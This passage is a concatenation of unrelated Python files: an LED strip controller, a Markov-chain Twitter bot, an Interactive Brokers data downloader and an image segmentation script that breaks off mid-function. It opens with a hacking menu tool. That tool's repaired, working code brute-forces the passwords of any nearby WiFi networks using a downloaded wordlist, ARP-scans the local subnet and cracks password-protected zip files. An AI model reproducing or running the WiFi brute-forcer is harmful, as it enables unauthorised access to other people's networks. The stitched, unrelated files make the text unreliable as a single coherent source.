def Wifi_Brute_force():
    """Wifi dictionary attack / local network ARP scan, selected via
    command-line flags (-w / -a)."""
    try:
        from scapy.all import srp, Ether, ARP, conf
        # BUG FIX: `import urllib2` does not exist on Python 3 (this file is
        # Python 3: print-function, input()), so the whole feature died with
        # the misleading "scapy tidak ditemukan" message.
        from urllib.request import urlopen
        from wifi import Cell, Scheme, exceptions
        def scan_ips(interface='wlan0', ips='192.168.1.0/24'):
            # ARP-scan the subnet and print every answering host.
            print("""
        [+] STARTING G.O.D
        """)
            try:
                print("[+] SCANNING ")
                conf.verb = 0
                ether = Ether(dst="ff:ff:ff:ff:ff:ff")
                arp = ARP(pdst=ips)
                answer, unanswer = srp(ether / arp, timeout=2, iface=interface, inter=0.1)
                for sent, received in answer:
                    print(received.summary())
            except KeyboardInterrupt:
                sys.exit(1)
        def start():
            print("[+] bentar ya! download passwordlist nya dulu hehe")
            url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt"
            response = urlopen(url)
            # BUG FIX: the original referenced an undefined name `txt`;
            # the downloaded body was never read.
            txt = response.read().decode('utf-8', errors='ignore')
            passwords = txt.splitlines()
            networks = Cell.all('wlan0')
            nb_loops = len(passwords) * len(networks)
            print("[*] {} networks di temukan!. program akan looping {} kali!!".format(len(passwords), nb_loops))
            nb_test = 0
            for password in passwords:
                for cell in networks:
                    try:
                        # BUG FIX: the candidate password was never used --
                        # the literal 'test' was passed for every attempt.
                        scheme = Scheme.for_cell('wlan0', 'home', cell, password)
                        scheme.activate()
                        print("[+] Connect ke {} dengan `{}` passkey bekerja!!".format(cell, password))
                        sys.exit(0)
                    except exceptions.ConnectionError:
                        pass
                    finally:
                        nb_test += 1
                        sys.stdout.write('\r{} / {}'.format(nb_test, nb_loops))
                        sys.stdout.flush()
            print("You Are Not Lucky :'(\nFUCK YOU!!")
        def main():
            parser = argparse.ArgumentParser()
            parser.add_argument("-w", "--wifi_brute_force", action="store_true", help="Cobalah untuk mem bruteforce beberapa wifi yang kena respond dari area mu")
            parser.add_argument("-a", "--scan_ips", action="store_true", help="Scan semua IPs dalam network ini")
            args = parser.parse_args()
            if args.wifi_brute_force:
                # BUG FIX: was `wifi_bruteforce.start` -- an undefined name,
                # and not even a call.
                start()
            if args.scan_ips:
                # BUG FIX: was `network_scanner.scan()` -- undefined name.
                scan_ips()
        if __name__ == '__main__':
            main()
    except ImportError:
        print("[!] scapy : Tidak Di temukan!\n")
def zip_attack():
    """Dictionary attack on a password-protected zip file; the zip path and
    wordlist come from command-line arguments (-f / -d)."""
    def extractFile(zFile, password):
        # Try one password; True when extraction succeeds.
        try:
            # pwd must be bytes on Python 3.
            zFile.extractall(pwd=password.encode('utf-8'))
            print("[*] Password Di Temukan = " + password)
            return True
        except Exception:
            return False
    def main():
        parser = argparse.ArgumentParser("%prog -f <zipfile> -d <dictionary>")
        parser.add_argument("-f", dest="zname", help="membutuhkan zip file berpassword")
        parser.add_argument("-d", dest="dname", help="membutuhkan file dictionary")
        # BUG FIX: the original never called parse_args(), so every use of
        # `args` below raised NameError.
        args = parser.parse_args()
        if args.zname is None:
            print(parser.usage)
            exit(0)
        elif args.dname is None:
            # No dictionary given: fall back to the bundled default list.
            zname = args.zname
            dname = 'passwords.txt'
        else:
            zname = args.zname
            dname = args.dname
        zFile = zipfile.ZipFile(zname)
        passFile = open(dname)
        for line in passFile.readlines():
            password = line.strip("\n")
            found = extractFile(zFile, password)
            if found == True:
                exit(0)
        print("[-] Password Tidak Di temukan!")
    if __name__ == "__main__":
        main()
def Ask():
    """Print the main tool menu (options 1-5)."""
    print("""
    [1] Port Scanner
    [2] SSH Dicker
    [3] Server Vuln Scanner
    [4] Wifi Brute Force
    [5] Zip Attacker
    """)
def Optionss():
    """Interactive loop: read a menu choice and dispatch to the chosen tool.

    Loops forever; unknown input prints an error and prompts again.
    """
    actions = {
        "1": PortScanner,
        "2": ssh_dicker,
        "3": ServerVulnScanner,
        "4": Wifi_Brute_force,
        "5": zip_attack,
    }
    while True:
        choice = input("[?] ")
        action = actions.get(choice)
        if action is not None:
            action()
        elif choice != "\n":
            print("[!] Invalid Options!")
# Entry point: show the menu, then hand control to the interactive loop.
Ask()
Optionss()
|
LedStrip.py | import colorsys
import logging
from threading import Thread, Event
from time import sleep
from Animation import LinearInterpolateAnimation
class LedStrip:
    """Controls an addressable LED strip exposed through *node*.

    Public setters only record the desired state and wake a background
    daemon thread (via update_event); that thread performs all writes to
    the device, either animation frames or the solid current color.
    """
    # Number of LEDs on the strip; the device expects one RRGGBB hex
    # triplet per LED in ColorBytes.
    LED_COUNT = 180
    def __init__(self, node):
        self.node = node
        # Current (or animation target) color as [r, g, b], 0-255 each.
        self.rgb_colors = [0, 0, 0]
        self.animation = None
        # Last hex string written to the device, used to skip no-op writes.
        self.color_bytes_str = ''
        self.update_event = Event()
        self.thread = Thread(target=self.thread_function, daemon=True)
        self.thread.start()
    def set_animation(self, animation):
        """Start playing *animation* on the background thread."""
        self.animation = animation
        self.update_event.set()
    def clear_animation(self):
        """Stop any running animation (the thread then rewrites the solid color)."""
        self.animation = None
        self.update_event.set()
    def set_color_rgb(self, rgb_colors):
        """Set a solid color; *rgb_colors* is [r, g, b] with 0-255 components."""
        self.clear_animation()
        self.rgb_colors = rgb_colors
        self.update_event.set()
    def set_color_hsl(self, hsl_colors):
        """Set a solid color from [h, s, l] percentage values (0-100)."""
        self.clear_animation()
        self.rgb_colors = LedStrip.convert_hsl_to_rgb(hsl_colors)
        self.update_event.set()
    def animate_to_rgb(self, rgb_color, duration_sec):
        """Fade linearly from the current color to *rgb_color* over *duration_sec*."""
        self.clear_animation()
        self.animation = LinearInterpolateAnimation(LedStrip.LED_COUNT, self.rgb_colors, rgb_color, duration_sec)
        # Record the target as the logical current color right away (copy, so
        # later mutation of the caller's list cannot leak in).
        self.rgb_colors = rgb_color[:]
        self.update_event.set()
    def get_color_rgb_str(self):
        """Return the current color as 'r,g,b'."""
        return LedStrip.color_array_to_str(self.rgb_colors)
    def get_color_hsl(self):
        """Return the current color as [h, s, l] percentages."""
        return LedStrip.convert_rgb_to_hsl(self.rgb_colors)
    def get_color_hsl_str(self):
        """Return the current color as 'h,s,l' (percentages)."""
        return LedStrip.color_array_to_str(LedStrip.convert_rgb_to_hsl(self.rgb_colors))
    def thread_function(self):
        # Daemon loop: sleep on update_event, then write either the next
        # animation frame or the solid current color to the device.
        while True:
            self.update_event.wait()
            write_current_color_and_clear_evt = True
            if self.animation:
                anim_result = self.animation.step()
                if anim_result:
                    # Build one RRGGBB hex triplet per LED for this frame.
                    value_str = ''
                    for color in anim_result:
                        value_str += '%02x%02x%02x' % (color[0], color[1], color[2])
                    self.update_color_bytes(value_str)
                    # Leave the event set so the next frame is processed on
                    # the next loop iteration.
                    write_current_color_and_clear_evt = False
            if write_current_color_and_clear_evt:
                # No (more) animation frames: write the solid color to every
                # LED once, then go back to sleeping on the event.
                self.update_color_bytes(('%02x%02x%02x' % (self.rgb_colors[0], self.rgb_colors[1], self.rgb_colors[2])) * LedStrip.LED_COUNT)
                self.update_event.clear()
            sleep(0.010)  # pace device writes
    def update_color_bytes(self, color_bytes_str):
        """
        update LED colors on device (if required)
        :param color_bytes_str: HEX string containing the color of each LED
        """
        if self.color_bytes_str == color_bytes_str:
            return # no need to update
        try:
            self.node.ColorBytes = color_bytes_str
            self.color_bytes_str = color_bytes_str
        except BaseException:
            logging.error('Writing LED strip failed')
    @staticmethod
    def color_array_to_str(array):
        """Format a 3-element color array as 'a,b,c'."""
        return '%d,%d,%d' % (array[0], array[1], array[2])
    @staticmethod
    def convert_rgb_to_hsl(rgb_colors):
        # colorsys returns (h, l, s); reorder to [h, s, l] scaled to 0-100.
        hls = colorsys.rgb_to_hls(rgb_colors[0] / 255, rgb_colors[1] / 255, rgb_colors[2] / 255)
        return [int(hls[0] * 100), int(hls[2] * 100), int(hls[1] * 100)]
    @staticmethod
    def convert_hsl_to_rgb(hsl_colors):
        # colorsys expects (h, l, s); the input is [h, s, l] percentages.
        rgb = colorsys.hls_to_rgb(hsl_colors[0] / 100, hsl_colors[2] / 100, hsl_colors[1] / 100)
        return [int(rgb[0] * 255), int(rgb[1] * 255), int(rgb[2] * 255)]
|
mainbot.py | # Import the twython module
from . import twythonaccess
# import time and sys
import time
# import the users class
from .users import Users
# import markov
from .markov import Markov
# import fastreplystreamer
from .fastreplystreamer import FastReplyStreamer
# import apikeys to authenticate streamer
from . import apikeys
# import Thread to be able to run concurrently
from threading import Thread
# randint for the tweet interval
from random import randint
# the main function will be called when this script is called in terminal
# the bash command "python3 mainbot.py" will call this function
def main():
    """Entry point: build the users/markov state (retrying on failure), then
    run the reply streamer and the tweet loop on two concurrent threads."""
    # Retry setup until it succeeds; an hour-long sleep between attempts lets
    # rate limits and transient twitter outages clear.
    while True:
        try:
            setup()
        except Exception as exception:
            print(exception)
            print("will sleep for 1 hour to avoid exception")
            time.sleep(60*60)
            print("exception sleep in setup now finished; retrying setup")
        else:
            break
    # Both workers loop forever; threads let them run concurrently.
    reply_streamer_thread = Thread(target=reply_streamer)
    tweet_loop_thread = Thread(target=tweet_loop)
    reply_streamer_thread.start()
    tweet_loop_thread.start()
# create the global markov and users instances
def setup():
    """Create the module-global `users` and `markov` objects.

    The markov model is trained on the followers' tweets, the tweets of
    goranhagglund and rossa_d, and the follow-followers' tweets.
    """
    global markov, users
    # The users object holds the two arrays `followers` and `followfollowers`;
    # instantiating it also starts checking for (and greeting) new followers.
    users = Users()
    print("initialized users")
    # instantiate the markov object
    #markov = Markov(users.followers_tweets + users.followfollowers_tweets)
    # do this instead: mix the followers' tweets with tweets from goranhagglund and rossa_d
    # Two rate-limit checks: the two show_user() calls below each count as a request.
    twythonaccess.check_if_requests_are_maximum(170)
    twythonaccess.check_if_requests_are_maximum(170)
    ghAndRdTweets = users.get_tweets([
        twythonaccess.authorize().show_user(screen_name="goranhagglund"),
        twythonaccess.authorize().show_user(screen_name="rossa_d")])
    markov = Markov(users.followers_tweets + ghAndRdTweets + users.followfollowers_tweets)
    print("initialized markov")
    # the users object should be able to reference the markov object
    users.markov = markov
    print("setup complete")
# this function will be executed in one thread, and tweet_loop on the other
# purpose to isolate this in streaming api is to reply to all tweets mentioning self quickly
def reply_streamer():
    """Run the streaming-API listener that replies quickly to mentions.

    Runs forever: on any error, sleep one hour (clears rate limits and
    waits out twitter outages), then reconnect the filter stream.
    """
    print("starting registering for streaming api")
    # initialize the fastreplystreamer
    streamer = FastReplyStreamer(apikeys.CONSUMER_KEY, apikeys.CONSUMER_SECRET, apikeys.ACCESS_TOKEN, apikeys.ACCESS_TOKEN_SECRET)
    # pass this markov instance to the streamer, so it will be able to generate replies
    streamer.markov = markov
    # start the filter on mentions of our own screen name
    # nest it in error handling
    while True:
        try:
            streamer.statuses.filter(track=("@" + twythonaccess.screen_name))
        except Exception as exception:
            # print the exception and then sleep for an hour
            # the sleep will reset rate limit
            # if twitter's servers were down, they may be up after the sleep
            # after the sleep, the filter function will be called anew
            print(exception)
            print("will sleep for 1 hour to avoid exception")
            time.sleep(60*60)
            print("finished sleep after exception in streaming api. will now start anew")
# the run loop, which will continue in infinity
def tweet_loop():
    """Endless loop: post one markov-generated tweet, sleep a randomized
    interval peaking around 24 hours, then refresh the followers/tweets
    data and retrain the markov model. Every error is absorbed with a
    one-hour sleep before the loop continues."""
    while True:
        print("start loop")
        # the try is for error handling
        # if any of the twython methods (nested or not) raise an exception,
        # then it will be caught in this except clause
        # the except clause will do nothing but sleep for a while,
        # and then continue with the loop
        try:
            # send tweet: keep generating until one passes send_tweet's checks
            while True:
                # generate new tweet
                tweet = markov.generate_tweet()
                print("tweet generated: " + tweet)
                if twythonaccess.send_tweet(tweet):
                    # the generated tweet is okay
                    print("tweet approved or passed")
                    break
            # sleeping point, if need for sleep
            # sleep for one day
            # make the sleep somewhat randomized
            # can range from 5 minutes to 3 days
            # make the distribution curve peak at 24 hours
            # get a random integer between 5 and 2.25*24*60, representing minutes
            # based on calculations, do first loop 5 times and second loop once
            min_sleep = 5
            max_sleep = 2.25*24*60
            sleep_minutes = randint(min_sleep, max_sleep)
            # NOTE(review): range(0,4) iterates 4 times, not the 5 the comment
            # above promises -- confirm which was intended.
            for i in range(0,4):
                # if the value isn't in the specified range, then regenerate the value
                # this will increase the statistical probability of the value falling in the range, while not limiting the value directly
                # first limit the value in a close range, then in a bigger range, order is important
                # this will make the curve like a double-sided stairway with three levels, the middle level being the widest
                if sleep_minutes < 23*60 or sleep_minutes > 27*60:
                    sleep_minutes = randint(min_sleep, max_sleep)
            # second loop, wider, designed to catch almost all values
            for i in range(0,1):
                if sleep_minutes < 6*60 or sleep_minutes > 46*60:
                    sleep_minutes = randint(min_sleep, max_sleep)
            print("will sleep for " + str(sleep_minutes) + " minutes")
            time.sleep(sleep_minutes * 60)
            print("has slept for " + str(sleep_minutes) + " minutes")
            # temporary sleep
            #time.sleep(60*60)
            # update the users followers
            users.check_new_followers()
            print("updated followers")
            #print("followers:")
            #for follower in users.followers:
            #print(follower["screen_name"])
            #time.sleep(1)
            #print "followfollowers:"
            #for followfollower in users.followfollowers:
            #print(followfollower["screen_name"])
            #time.sleep(1)
            # update the tweets
            users.check_new_tweets()
            print("updated tweets")
            #print("follower's tweets:")
            #for follower_tweet in users.followers_tweets:
            #print(follower_tweet["text"])
            #time.sleep(1)
            # get the rossana and goran tweets
            ghAndRd = ["goranhagglund", "rossa_d"]
            ghAndRdTweets = []
            for id in ghAndRd:
                twythonaccess.check_if_requests_are_maximum(170)
                this_users_tweets = twythonaccess.authorize().get_user_timeline(screen_name=id, trim_user=True, include_rts=False)
                ghAndRdTweets.extend(this_users_tweets)
            # update the markov
            markov.update_markov(users.followers_tweets + ghAndRdTweets + users.followfollowers_tweets)
            print("markov updated")
        except Exception as exception:
            # print out the exception, and then sleep for 1 hour
            # the exception may be a rate limit, or it may be due to twitter's servers being down
            # either way, a sleep will help
            print(exception)
            print("will sleep for 1 hour to avoid exception")
            time.sleep(60*60)
            print("finished exception sleep; will resume tweet generation loop as normal")
# Run the bot when this module is executed directly ("python3 mainbot.py").
if __name__ == "__main__":
    main()
|
histdata.py | import queue
from dataclasses import dataclass, field
from datetime import datetime, date
from threading import Thread
from typing import List, Callable
import pandas
from dateutil.relativedelta import relativedelta
from ibapi.client import EClient
from ibapi.contract import Contract as IBcontract
from ibapi.wrapper import EWrapper
# Request ids used when the caller does not supply one.
DEFAULT_HISTORIC_DATA_ID = 50
DEFAULT_GET_CONTRACT_ID = 43
# Unique sentinel objects used as in-band queue markers / status flags.
FINISHED = object()
STARTED = object()
TIME_OUT = object()
# Upper bound (seconds) on how long we block waiting for IB to answer.
MAX_WAIT_SECONDS = 30
@dataclass
class Observable:
    """Minimal observer registry: callables subscribe and are invoked on notify()."""
    observers: List[Callable] = field(default_factory=list)

    def register(self, observer: Callable):
        """Subscribe *observer* to future notifications."""
        self.observers.append(observer)

    def unregister(self, observer: Callable):
        """Remove a previously registered observer."""
        self.observers.remove(observer)

    def notify(self, *args, **kwargs):
        """Invoke every registered observer with the given arguments."""
        for callback in self.observers:
            callback(*args, **kwargs)
class _FinishableQueue(object):
    """Wraps a queue whose producer signals completion by enqueueing FINISHED."""
    def __init__(self, queue_to_finish):
        self._queue = queue_to_finish
        self.status = STARTED

    def get(self, timeout):
        """
        Returns a list of queue elements once timeout is finished, or a FINISHED flag is received in the queue
        :param timeout: how long to wait before giving up
        :return: list of queue elements
        """
        collected = []
        while True:
            try:
                element = self._queue.get(timeout=timeout)
            except queue.Empty:
                # A timeout makes it unlikely FINISHED is still coming;
                # give up and return what we have.
                self.status = TIME_OUT
                break
            if element is FINISHED:
                self.status = FINISHED
                break
            # keep collecting and try to get more data
            collected.append(element)
        return collected

    def timed_out(self):
        """True when the most recent get() gave up waiting."""
        return self.status is TIME_OUT
class _Wrapper(EWrapper):
    """
    The wrapper deals with the action coming back from the IB gateway or TWS instance
    We override methods in EWrapper that will get called when this action happens, like currentTime
    Extra methods are added as we need to store the results in this object
    """
    def __init__(self):
        super().__init__()
        # Per-request queues, keyed by reqId / tickerId.
        self._contractDetails = {}
        self._historicDataDict = {}
        self.initError()
    # error handling code
    def initError(self):
        # Queue collecting error strings pushed by the error() callback.
        errorQueue = queue.Queue()
        self._errorQueue = errorQueue
    def getError(self, timeout=5):
        """Pop one queued error message, or None if nothing arrives within *timeout*."""
        if self.isError():
            try:
                return self._errorQueue.get(timeout=timeout)
            except queue.Empty:
                return None
        return None
    def isError(self):
        """True when at least one error message is waiting."""
        an_error_if = not self._errorQueue.empty()
        return an_error_if
    def error(self, id, errorCode, errorString):
        # EWrapper callback. `id` shadows the builtin, but the parameter name
        # is fixed by the overridden API signature.
        errorMsg = "IB error id %d error code %d string %s" % (id, errorCode, errorString)
        self._errorQueue.put(errorMsg)
    # get contract details code
    def initContractDetails(self, reqId):
        # Create (or replace) the queue that will receive details for reqId.
        contract_details_queue = self._contractDetails[reqId] = queue.Queue()
        return contract_details_queue
    def contractDetails(self, reqId, contractDetails):
        # EWrapper callback: one contractDetails object per matching contract.
        if reqId not in self._contractDetails.keys():
            self.initContractDetails(reqId)
        self._contractDetails[reqId].put(contractDetails)
    def contractDetailsEnd(self, reqId):
        # EWrapper callback: end of stream, marked with the FINISHED sentinel.
        if reqId not in self._contractDetails.keys():
            self.initContractDetails(reqId)
        self._contractDetails[reqId].put(FINISHED)
    def initHistoricPriceQueue(self, tickerId):
        # Create (or replace) the queue that will receive bars for tickerId.
        historic_data_queue = self._historicDataDict[tickerId] = queue.Queue()
        return historic_data_queue
    def historicalData(self, tickerId, bar):
        # EWrapper callback: store each bar as a (date, open, high, low, close, volume) tuple.
        barData = (bar.date, bar.open, bar.high, bar.low, bar.close, bar.volume)
        historic_data_dict = self._historicDataDict
        if tickerId not in historic_data_dict.keys():
            self.initHistoricPriceQueue(tickerId)
        historic_data_dict[tickerId].put(barData)
    def historicalDataEnd(self, tickerId, start: str, end: str):
        # EWrapper callback: end of historical data, marked with FINISHED.
        if tickerId not in self._historicDataDict.keys():
            self.initHistoricPriceQueue(tickerId)
        self._historicDataDict[tickerId].put(FINISHED)
class _Client(EClient, Observable):
    """Low-level IB API client: resolves contracts and downloads historical bars."""

    # Upper bound (seconds) we wait for the server to answer a request.
    # BUG FIX: this was a local variable inside resolveContract, so
    # fetchHistoricalData raised NameError the first time it was called.
    MAX_WAIT_SECONDS = 10

    def __init__(self, wrapper):
        EClient.__init__(self, wrapper)
        Observable.__init__(self)

    def resolveContract(self, ibContract, reqId=DEFAULT_GET_CONTRACT_ID):
        """
        From a partially formed contract, returns a fully fledged version
        :returns fully resolved IB contract
        """
        # Make a place to store the data we're going to return.
        contract_details_queue = _FinishableQueue(self.wrapper.initContractDetails(reqId))
        self.notify("Getting full contract details from the server... ")
        self.reqContractDetails(reqId, ibContract)
        # Run until we get a valid contract(s) or get bored waiting.
        new_contract_details = contract_details_queue.get(timeout=self.MAX_WAIT_SECONDS)
        while self.wrapper.isError():
            self.notify(self.wrapper.getError())
        if contract_details_queue.timed_out():
            self.notify("Exceeded maximum wait for wrapper to confirm finished - seems to be normal behaviour")
        if len(new_contract_details) == 0:
            self.notify("Failed to get additional contract details: returning unresolved contract")
            return ibContract
        if len(new_contract_details) > 1:
            self.notify("got multiple contracts using first one")
        # Use the first (usually only) match.
        new_contract_details = new_contract_details[0]
        resolved_ibcontract = new_contract_details.contract
        return resolved_ibcontract

    def fetchHistoricalData(self, ibContract, endDataTime=None,
                            durationStr="1 Y", barSizeSetting="1 day", tickerId=DEFAULT_HISTORIC_DATA_ID):
        """Request historical TRADES bars and return them as a list of tuples.

        :param ibContract: fully resolved IB contract
        :param endDataTime: "YYYYMMDD HH:MM:SS TZ" string; defaults to "now"
        :param durationStr: IB duration string, e.g. "1 Y", "1 M", "5 D"
        :param barSizeSetting: IB bar size, e.g. "1 day", "1 min"
        :param tickerId: request id distinguishing concurrent downloads
        :return: list of (date, open, high, low, close, volume) tuples
        """
        # BUG FIX: the old default argument evaluated datetime.today() once at
        # import time, so long-running processes silently requested stale data.
        if endDataTime is None:
            endDataTime = datetime.today().strftime("%Y%m%d %H:%M:%S %Z")
        # Make a place to store the data we're going to return.
        historic_data_queue = _FinishableQueue(self.wrapper.initHistoricPriceQueue(tickerId))
        self.reqHistoricalData(
            tickerId,  # reqId,
            ibContract,  # contract,
            endDataTime,  # endDateTime,
            durationStr,  # durationStr,
            barSizeSetting,  # barSizeSetting,
            "TRADES",  # whatToShow,
            1,  # useRTH,
            2,  # formatDate (epoch seconds)
            False,  # keepUpToDate <<==== added for api 9.73.2
            []  # chartOptions not used
        )
        # Wait until we get completed data, an error, or get bored waiting.
        self.notify("Getting historical data from the server... could take %d seconds to complete " % self.MAX_WAIT_SECONDS)
        historic_data = historic_data_queue.get(timeout=self.MAX_WAIT_SECONDS)
        cancelTask = False
        while self.wrapper.isError():
            self.notify(self.wrapper.getError())
            cancelTask = True
        if historic_data_queue.timed_out():
            self.notify("Exceeded maximum wait for wrapper to confirm finished - seems to be normal behaviour")
            cancelTask = True
        if cancelTask:
            # Tell the server to stop streaming a request we gave up on.
            self.cancelHistoricalData(tickerId)
        return historic_data
class BrokerClient(Observable):
    """High-level facade over the IB wrapper/client pair.

    Connects on construction and forwards progress notifications to
    registered listeners.
    """
    def __init__(self, ipaddress: str, port: int, clientId: int):
        Observable.__init__(self)
        self._wrapper = _Wrapper()
        self._client = _Client(wrapper=self._wrapper)
        self.connect(ipaddress, port, clientId)

    @property
    def lowLevelClient(self):
        # Escape hatch to the raw client for callers needing direct API access.
        return self._client

    def buildContract(self, symbol: str, secType: str, exchange: str, currency: str):
        """Build a partially specified IB contract and resolve it via the server."""
        contract = IBcontract()
        contract.symbol = symbol
        contract.secType = secType
        contract.exchange = exchange
        contract.currency = currency
        return self._client.resolveContract(contract)

    def fetchHistoricalData(self, contract, fromDate, endDate, barSizeSetting):
        """Download bars between fromDate and endDate, split into month-sized requests.

        Ranges longer than one month are walked backwards from endDate in
        '1 M' chunks, then fetched oldest-first so bars come back in
        chronological order.
        """
        timeFormat = "%Y%m%d %H:%M:%S %Z"
        dateDuration = endDate - fromDate
        chunks = []
        # Length (in days) of the month starting at fromDate.
        currentMonth = (fromDate + relativedelta(months=1)) - fromDate
        if dateDuration.days <= currentMonth.days:
            # Short range: a single request covers it.
            dateStr = endDate.strftime(timeFormat)
            chunks = [(dateStr, f'{dateDuration.days} D')]
        else:
            offsetDate = endDate
            daysCount = dateDuration.days
            while True:
                dateStr = offsetDate.strftime(timeFormat)
                chunks.append((dateStr, '1 M'))
                # Number of days in the month preceding offsetDate.
                month = offsetDate - (offsetDate - relativedelta(months=1))
                offsetDate -= relativedelta(months=1)
                daysCount -= month.days
                if daysCount <= 0:
                    break
        historicData = []
        counter = 1
        # Oldest chunk first.
        chunks.reverse()
        for endDateStr, durationStr in chunks:
            self.notify(endDateStr)
            data = self._client.fetchHistoricalData(contract, endDataTime=endDateStr, durationStr=durationStr,
                                                    barSizeSetting=barSizeSetting, tickerId=counter)
            historicData += data
            counter = counter + 1
        return historicData

    def connect(self, ipaddress: str, port: int, clientId: int):
        """Open the socket and run the EClient message loop on a worker thread."""
        self._client.connect(ipaddress, port, clientId)
        thread = Thread(target=self._client.run)
        thread.start()
        setattr(self, "_thread", thread)
        # Fresh error queue for the new session.
        self._wrapper.initError()

    def disconnect(self):
        # Safe to call even if construction failed part-way.
        if self._client:
            self._client.disconnect()

    def saveAsCsv(self, historicData, tickerName):
        """Write bars to <tickerName>.csv with timestamps converted to US/Eastern."""
        df = pandas.DataFrame(historicData, columns=['DateTime', 'Open', 'High', 'Low', 'Close', 'Volume'])
        # Bars arrive with epoch-second timestamps (formatDate=2 in the request).
        df['DateTime'] = pandas.to_datetime(df['DateTime'], unit='s').dt.tz_localize('UTC').dt.tz_convert('US/Eastern')
        df.to_csv(f'{tickerName}.csv')
        self.notify(f'Data has been saved as {tickerName}.csv')

    def register(self, listener: Callable):
        """Subscribe listener to notifications from both this facade and the client."""
        super().register(listener)
        self._client.register(listener)

    def unregister(self, listener: Callable):
        super().unregister(listener)
        self._client.unregister(listener)
if __name__ == '__main__':
    # Connect to a locally running IB Gateway (port 4001) as client id 2.
    app = BrokerClient("127.0.0.1", 4001, 2)
    # Echo all progress notifications to stdout.
    app.register(print)
    contract = app.buildContract("AMD", "STK", "SMART", "USD")
    fromDate = date(2020, 11, 1)
    toDate = date(2020, 11, 11)  # = date.today()
    data = app.fetchHistoricalData(contract, fromDate, toDate, '1 min')
    app.saveAsCsv(data, 'AMD')
    app.disconnect()
|
segmentNucAndGFP.py | # segmentNucAndGFP.py
#######################################################
#
# Segmentation pipeline for :
# - Load original images
# - Detect lipid droplets (LDs) and nuclei
# - Save the "cleaned" images
#
#######################################################
import os
import cv2
import numpy as np
from scipy import ndimage
import multiprocessing
import Queue
import threading
import settings
import csv
## Thread worker
## Get the paths of the images and
## Process them to extract clean masks of the LDs and the nuclei
## Save the images as tif for later use in CellProfiler
def _parsePlateWell(path):
    """Extract (zero-padded plate index, well name) from a path shaped like
    '.../plate<NN>/.../Well <X>/...'."""
    idxPlate = path.rsplit('plate')[1].rsplit('/')[0].zfill(2)
    idxWell = path.rsplit('Well ')[1].rsplit('/')[0]
    return idxPlate, idxWell


def workerSeg():
    """Queue worker: segment every GFP/Hoechst tif in each queued folder.

    Reads folder paths from the global queue `q` (fully populated before the
    workers start, so q.empty() is a safe termination condition) and writes
    originals, cleaned images and masks to the global output folders.
    """
    while not q.empty():
        currSubPath = q.get()
        print("%s\n" % currSubPath)
        listFiles = [x for x in os.listdir(currSubPath) if x.endswith('.tif')]
        gfpList = [x for x in listFiles if x.startswith("GFP")]
        nucList = [x for x in listFiles if x.startswith("Hoechst")]
        for gfpName in gfpList:
            gfpPath = currSubPath + gfpName
            idxPlate, idxWell = _parsePlateWell(gfpPath)
            print("Detecting P%s_%s\n" % (idxPlate, idxWell))
            imgGFP = cv2.imread(gfpPath, -1)
            cv2.imwrite(inputCellProfilerPath + 'P' + idxPlate + '_' + idxWell + "_GFP.tif", imgGFP, [cv2.CV_16U])
            imgMaskGFP = detectGFP(imgGFP, 20)
            imgDet = imgMaskGFP * imgGFP
            imgDet = imgDet.astype(np.uint16)
            cv2.imwrite(outputDetPath + 'P' + idxPlate + '_' + idxWell + "_GFP_CL.tif", imgDet, [cv2.CV_16U])
            cv2.imwrite(outputDetPath + 'P' + idxPlate + '_' + idxWell + "_GFP_MASK.tif", imgMaskGFP * 255)
        for nucName in nucList:
            nucPath = currSubPath + nucName
            # BUG FIX: idxPlate/idxWell used to be leftovers from the GFP loop
            # above, raising NameError whenever a folder had no GFP images.
            idxPlate, idxWell = _parsePlateWell(nucPath)
            print("%s in progress" % nucPath)
            imgNUC = cv2.imread(nucPath, -1)
            imgMaskNUC = detectNucs(imgNUC, 40)
            imgDet = imgMaskNUC * imgNUC
            imgDet = imgDet.astype(np.uint16)
            cv2.imwrite(outputDetPath + 'P' + idxPlate + '_' + idxWell + "_NUC_MASK.tif", imgMaskNUC * 255)
            cv2.imwrite(outputDetPath + 'P' + idxPlate + '_' + idxWell + "_NUC_CL.tif", imgDet, [cv2.CV_16U])
            cv2.imwrite(inputCellProfilerPath + 'P' + idxPlate + '_' + idxWell + "_NUC.tif", imgDet, [cv2.CV_16U])
## Function to detect lipid droplets in BODIPY channel ##
def detectGFP(imgToProces, typicDiam):
    """Detect lipid droplets in the BODIPY/GFP channel.

    :param imgToProces: raw LD image (2-D intensity array)
    :param typicDiam: average droplet diameter in pixels (resolution dependent)
    :return: mask image of the cleaned LDs (values 0/1/2; >0 means droplet)
    """
    halfDiam = round(typicDiam / 2)
    # Clean the background with an Otsu threshold on the normalized image.
    imgToProcNorm = norm255(imgToProces)
    imgToProcNorm = np.uint8(imgToProcNorm)
    ret, imgToProcOtsu = cv2.threshold(imgToProcNorm, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    imgToProcOtsu[imgToProcOtsu > 0] = 1
    cleanImage = imgToProcOtsu * imgToProces
    # Enhance the edges via Hessian-eigenvalue contrast on the inverted image.
    sigma = 0.6
    img = cleanImage.max() - cleanImage
    eigenimage = enhanceContrast(img, sigma)
    eigenimage = eigenimage.max() - eigenimage
    eigenimage[eigenimage < 100] = 0
    eigenimage[eigenimage > 0] = 1
    eigenimage = norm255(cleanImage) - norm255(eigenimage)
    eigenimage[eigenimage <= 0] = 0
    maskEigen = eigenimage.copy()
    maskEigen[maskEigen > 0] = 1
    # Enhance the droplets with top-hats at three scales around typicDiam.
    TH1 = TopHatBasic(cleanImage, typicDiam - halfDiam)
    TH2 = TopHatBasic(cleanImage, typicDiam)
    TH3 = TopHatBasic(cleanImage, typicDiam + halfDiam)
    THimage = TH1 + TH2 + TH3
    THimage[THimage > 0] = 1
    maskTH = THimage.copy()
    maskTH[maskTH > 0] = 1
    ## Compute mask of the 2 enhancements; 1 values are the uncertainty
    sumMask = maskTH + maskEigen
    ## We cleaned the uncertainty based on the intensity
    T = sumMask.copy()
    T[T == 2] = 0
    T = norm255(T)
    T = np.uint8(T)
    # BUG FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin int is the documented replacement.
    Topen = ndimage.binary_opening(T, structure=np.ones((2, 2))).astype(int)
    Topen = Topen * imgToProces
    Topen = norm255(Topen)
    Topen = np.uint8(Topen)
    # Otsu threshold computed only over the uncertain (non-zero) pixels.
    H = (Topen[Topen > 0])
    ret, imgToProcOtsu = cv2.threshold(H, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    TOtsu = Topen.copy()
